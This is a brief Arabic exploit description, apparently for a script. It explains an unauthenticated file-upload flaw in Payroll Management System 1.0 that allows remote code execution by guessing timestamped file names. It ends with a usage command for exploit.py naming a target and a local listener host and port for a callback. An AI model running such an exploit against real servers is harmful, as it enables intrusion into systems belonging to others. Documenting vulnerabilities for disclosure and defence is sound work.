

ثغرة RCE عبر رفع الملفات لـ https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. أسماء الملفات تسبقها طابع زمني بدقة دقيقة. يحاول السكربت تخمين اسم الملف باستخدام الطابع الزمني للدقيقة الحالية والدقيقة السابقة والدقيقة التالية.
يسمح نظام إدارة الرواتب الإصدار 1.0 للمستخدمين برفع الصور عبر صفحة "save_settings". يمكن لمهاجم غير مصادق استغلال هذه الوظيفة لرفع ملف PHP خبيث بدلاً من ذلك. يتم تخزين الملفات المرفوعة في مجلد عام الوصول وتُضاف إلى أسمائها طابع زمني بدقة دقيقة يمكن حسابه بسهولة. يؤدي الاستغلال الناجح لهذه الثغرة إلى القدرة على تنفيذ كود عشوائي بصلاحية المستخدم الذي يشغّل خادم الويب.
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
